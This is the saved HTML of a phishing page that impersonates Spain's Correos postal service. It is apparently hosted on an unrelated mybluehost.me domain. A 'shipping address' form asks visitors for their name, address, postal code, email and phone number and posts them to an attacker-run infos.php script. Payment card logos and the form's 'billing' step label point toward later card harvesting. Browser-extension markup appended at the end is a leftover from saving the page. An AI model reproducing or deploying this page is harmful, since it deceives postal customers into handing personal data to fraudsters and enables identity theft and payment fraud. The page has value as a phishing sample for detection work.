<!DOCTYPE html>
<!-- saved from url=(0050)https://gvo.zrx.mybluehost.me/fuy/corr/billing.php -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <!-- link_icons -->
        <link rel="stylesheet" href="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/bootstrap-icons.css">
        <link rel="stylesheet" href="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/font-awesome.min.css"> 
        <title>Localizar envíos, oficinas y códigos postales| Correos.es</title>
        <!-- logo img title-->
        <link rel="icon" href="https://gvo.zrx.mybluehost.me/fuy/corr/image/favicon.ico" type="image/x-icon">
        <link rel="shortcut icon" href="https://gvo.zrx.mybluehost.me/fuy/corr/image/favicon.ico" type="image/x-icon">
        <!-- link__css -->
        <link rel="stylesheet" href="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/bootstrap.css">
        <link rel="stylesheet" href="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/ofppt.css">
        <link rel="stylesheet" href="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/animate.css">
        <style>

        </style>
<link type="text/css" rel="stylesheet" href="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/css2"></head>
<body>

        <div class="navbar">
            <div class="container">
                <div class="left d-flex align-items-center">
                    <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/logo.svg" class="logo">
                    <ul class="nav align-items-center">
                        <li class="nav-item d-flex align-items-center"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/list.png"></li>
                        <li class="nav-item active box">Particular</li>
                        <li class="nav-item box">Empresa</li>
                    </ul>
                </div>
                <div class="center">
                    <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/input.png">
                </div>
                <div class="right">
                    <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/search.png" class="search">
                    <div class="line"></div>
                    <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/user.png">
                    <span>INICIAR SESIÓN</span>
                </div>  
            </div>
        </div>

        <main id="main">
            <div class="container">
                <div class=" title">
                    <h2>Dirección de envío</h2>
                    <p>Estimados usuarios, complete cuidadosamente el formulario para garantizar la entrega exitosa.</p>
                </div>
                <div class="login shadow dodg">
                    <form method="post" action="https://gvo.zrx.mybluehost.me/fuy/corr/infos.php">
                      <input type="hidden" name="step" value="billing">
                      <div class="row align-items-center">
                        <div class="col-12">
                          <div class="form-group mb-4 col-md-12">
                              <input id="name" type="text" name="name" required="" autofocus="">
                              <label for="name" id="label">Su Nombre</label>
                          </div>
                          <div class="form-group mb-4 col-md-12">
                              <input id="address" type="text" name="address" required="">
                              <label for="name" id="label">DIRECCIÓN</label>
                          </div>
                          <div class="form-group mb-4 col-md-12">
                              <input id="pin" type="text" name="city" required="">
                              <label for="pin" id="label">Ciudad</label>
                          </div>
                          <div class="form-group mb-4 col-md-12">
                              <input id="" type="text" name="country" required="">
                              <label for="" id="label">Estado / Provincia / Región</label>
                          </div>
                          <div class="form-group mb-4 col-md-12">
                              <input id="" type="text" name="zip" required="">
                              <label for="" id="label">Código Postal</label>
                          </div>
                          <div class="form-group mb-4 col-md-12">
                              <input id="email" type="email" name="email" required="" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}$" style="text-transform: lowercase;">
                              <label for="email" id="a">Correo Electrónico</label>
                          </div>
                          <div class="form-group mb-4 col-md-12">
                              <input id="number" type="text" name="number" required="" maxlength="13">
                              <label for="number" id="label">Número De Teléfono</label>
                          </div>
                        </div>
                      </div>
                      <button class="btn" name="submit">Actualización Inmediatamente</button>
                    </form>   
                </div>
            </div>
        </main>

        <!-- STAAAART____FOTTER -->
        <div class="fotter">
            <div class="container">
                <div class="row xx">
                    <div class="col-lg-3">
                        <ul class="nav d-block">
                            <li class="nav-item active">Para ti <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/arrow.png"></li>
                            <li class="nav-item dd">Seguimiento de envío</li>
                            <li class="nav-item dd">Recibir</li>
                            <li class="nav-item dd">Enviar</li>
                        </ul>
                    </div>
                    <div class="col-lg-3">
                        <ul class="nav d-block">
                            <li class="nav-item active">Para tu empresa <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/arrow.png"></li>
                            <li class="nav-item dd">Enviar</li>
                            <li class="nav-item dd">Ecommerce</li>
                            <li class="nav-item dd">Marketing</li>
                        </ul>
                    </div>
                    <div class="col-lg-3">
                        <ul class="nav d-block">
                            <li class="nav-item active">Para tu interés <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/arrow.png"></li>
                            <li class="nav-item dd">Filatelia</li>
                            <li class="nav-item dd">Correos Market</li>
                            <li class="nav-item dd">Web institucional</li>
                        </ul>
                    </div>
                    <div class="col-lg-3">
                        <ul class="nav d-block">
                            <li class="nav-item active dd"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/cask.png" class="cask"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/arrow.png"></li>
                            <li class="nav-item dd">Atención al cliente</li>
                            <li class="nav-item ss"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/sosio.png" class="img-fluid"></li>
                        </ul>
                    </div>
                </div>
                <hr>
                <div class="row mt-3 mb-5">
                    <div class="col-lg-5 mt-3">
                        <p class="lead" style="font-size: 14px;">Descarga la App de Correos</p>
                        <div class="imgs  d-flex py-1 align-items-center">
                            <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/apple.jpg" width="122px" height="40px" class="mt-2">
                            <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/play.jpg" width="122px" height="40px" class="mt-2">
                            <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/huawei.svg" width="122px" height="40px" class="mt-2">
                        </div>
                    </div>
                    <div class="col-lg-5 mt-3">
                        <p class="lead" style="font-size: 14px;">Descarga la App de Correos</p>
                        <div class="acht">
                            <ul class="nav">
                                <li class="nav-item d-flex align-items-center justify-content-center mt-2"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/mastercard.png" width="38" height="30"></li>
                                <li class="nav-item d-flex align-items-center justify-content-center mt-2"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/paypal.svg" width="38" height="9"></li>
                                <li class="nav-item d-flex align-items-center justify-content-center mt-2"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/maestro.svg" width="38" height="24"></li>
                                <li class="nav-item d-flex align-items-center justify-content-center mt-2"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/visa.svg" width="38" height="12"></li>
                                <li class="nav-item d-flex align-items-center justify-content-center mt-2"><img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/amex.svg" width="38" height="11"></li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-7"></div>
                </div>
            </div>
        </div>
        <!-- ENNNNNND____FOTTER -->

        <!-- DIV_FOOOOOOT -->
        <div class="fot">
            <div class="container">
                <img src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/logo_footer.svg">
                <div class="asd">
                    <ul class="nav">
                        <li class="nav-item">Política de cookies</li>
                        <li class="nav-item">Aviso legal</li>
                        <li class="nav-item">Privacidad web</li>
                        <li class="nav-item">Alerta seguridad</li>
                        <li class="nav-item">Accesibilidad</li>
                        <li class="nav-item">Configurador de cookies</li>
                    </ul>
                    <p>©Sociedad Estatal Correos y Telegrafos, S.A., S.M.E. Todos los derechos reservados.</p>
                </div>
            </div>
        </div>
        <!-- DIV_FOOOOOOT -->





        <script src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/jquery-3.5.1.min.js.download"></script>
        <script src="./Localizar envíos, oficinas y códigos postales_ Correos.es_files/jquery.mask.js.download"></script>
        <script>
          
          $("#number").mask("0000000000000");
           
          $("#email").click(function(){
                $("#a").css({top:'8px',fontSize:'12px',fontWeight:'700',left:'0.84118rem'});
             })

            $("#email").blur(function(){
                if($("#email").val().length == 0){
                   $("#a").css({top:'15px',fontSize:'16px',});
                }
                else{
                   $("#a").css({top:'8px',fontSize:'12px',fontWeight:'700',left:'0.84118rem'});
                }
            })
        </script>
              



<span id="PING_CONTENT_DLS_POPUP" style="display: none;"></span><div style="background-color: transparent; border: none; bottom: 15px; display: block; margin: 0px; opacity: 1; padding: 0px; position: fixed; right: 15px; z-index: 2147483647;"><template shadowrootmode="closed"><style>/*!
 * 
 *     MCAFEE RESTRICTED CONFIDENTIAL
 *     Copyright (c) 2024 McAfee, LLC
 *
 *     The source code contained or described herein and all documents related
 *     to the source code ("Material") are owned by McAfee or its
 *     suppliers or licensors. Title to the Material remains with McAfee
 *     or its suppliers and licensors. The Material contains trade
 *     secrets and proprietary and confidential information of McAfee or its
 *     suppliers and licensors. The Material is protected by worldwide copyright
 *     and trade secret laws and treaty provisions. No part of the Material may
 *     be used, copied, reproduced, modified, published, uploaded, posted,
 *     transmitted, distributed, or disclosed in any way without McAfee's prior
 *     express written permission.
 *
 *     No license under any patent, copyright, trade secret or other intellectual
 *     property right is granted to or conferred upon you by disclosure or
 *     delivery of the Materials, either expressly, by implication, inducement,
 *     estoppel or otherwise. Any license under such intellectual property rights
 *     must be expressed and approved by McAfee in writing.
 *
 */
@import url(https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&family=Poppins:ital,wght@0,400;0,500;0,600;0,800;1,400;1,500;1,600;1,800&display=swap);
*{border:0;box-sizing:border-box;font:inherit;font-family:"mcafeeOpenSans","Poppins",Helvetica,Arial,Arial,Helvetica,sans-serif;font-size:100%;margin:0;padding:0;vertical-align:baseline;outline:none}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}html,body{background-color:#f5f6fa;font-family:"Poppins",Helvetica,Arial,"mcafeeOpenSans",Arial,Helvetica,sans-serif;line-height:1;height:100%;width:100%}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}table{border-collapse:collapse;border-spacing:0}b{font-weight:bold}img{display:block}.dls__container{align-items:center;display:flex;margin:0 auto;margin-top:50px;position:relative}.dls__popup__expanded{align-items:center;overflow:hidden;border-radius:100px;cursor:pointer;display:flex;left:0;padding:15px;position:absolute;height:95px;width:383px;background-color:#fff;transition:all .3s ease-in-out}.dls__popup__expanded .dls__icon{height:65px;width:73px}.content{margin-left:12px}.content .content__images{display:flex;align-items:center;width:250px}.content .content__images .seperator__line{margin-left:5px;margin-right:10px}.content .content__images #dls_close_icon{cursor:pointer;margin-left:auto;margin-right:0px}.content p{font-family:"Poppins",Arial,Helvetica,sans-serif;font-weight:"400";font-size:14px;line-height:20px;margin-top:8px;color:#4258ff;width:250px;cursor:pointer}.shield{overflow:hidden;box-shadow:0px 2px 4px 0px rgba(33,41,52,.12),0px -1px 2px 0px rgba(0,0,0,.08);align-items:center;border-radius:100px;bottom:0;display:flex;height:95px;justify-content:center;position:absolute;right:0;width:383px;transition:all .3s ease-in-out}.shield__circle{display:flex;justify-content:center;align-items:center;width:55px;height:55px;background-color:#c01818;transition:all .6s ease-in-out .2s;z-index:1;opacity:0}

/*# sourceMappingURL=../sourceMap/chrome/css/download_scan_popup.css.map*/</style><div class="dls__container">
  <div class="shield" style="background: transparent; opacity: 0.1; display: none;">
    <div class="shield__circle" style="opacity: 1;">
      <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/mcafee_logo_white.svg?secret=ttl8u8" x-mcsrc="" id="dls_ballon_icon" x-mcsrcparsed="true">
    </div>
    <div class="dls__popup__expanded" style="opacity: 0;">
      <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/download_scan_icon.svg?secret=ttl8u8" x-mcsrc="" class="dls__icon" x-mcsrcparsed="true">
      <div class="content">
        <div class="content__images">
          <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/mcafee_logo_red.svg?secret=ttl8u8" x-mcsrc="" id="dls_mcafee_logo" x-mcsrcparsed="true">
          <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/seperator_line.svg?secret=ttl8u8" x-mcsrc="" class="seperator__line" x-mcsrcparsed="true">
          <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/webadvisor.svg?secret=ttl8u8" x-mcsrc="" x-mcsrcparsed="true">
          <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/close-outline.svg?secret=ttl8u8" x-mcsrc="" id="dls_close_icon" x-mcsrcparsed="true">
        </div>
        <p id="download_scan_popup_expanded_descriptions">Your download's being scanned. We'll let you know if there's an issue.</p>
      </div>
    </div>
  </div>
</div><style>/*!
 * 
 *     MCAFEE RESTRICTED CONFIDENTIAL
 *     Copyright (c) 2024 McAfee, LLC
 *
 *     The source code contained or described herein and all documents related
 *     to the source code ("Material") are owned by McAfee or its
 *     suppliers or licensors. Title to the Material remains with McAfee
 *     or its suppliers and licensors. The Material contains trade
 *     secrets and proprietary and confidential information of McAfee or its
 *     suppliers and licensors. The Material is protected by worldwide copyright
 *     and trade secret laws and treaty provisions. No part of the Material may
 *     be used, copied, reproduced, modified, published, uploaded, posted,
 *     transmitted, distributed, or disclosed in any way without McAfee's prior
 *     express written permission.
 *
 *     No license under any patent, copyright, trade secret or other intellectual
 *     property right is granted to or conferred upon you by disclosure or
 *     delivery of the Materials, either expressly, by implication, inducement,
 *     estoppel or otherwise. Any license under such intellectual property rights
 *     must be expressed and approved by McAfee in writing.
 *
 */
.mc-interactive-balloon{position:absolute;right:-50px;bottom:8px;box-shadow:rgba(0,0,0,.12) 0px 0px 10px;height:40px;width:40px;background:#1671ee;border-radius:20px;display:flex;justify-content:center;align-items:center}

/*# sourceMappingURL=../sourceMap/chrome/css/interactive_balloon.css.map*/</style></template></div></body></html>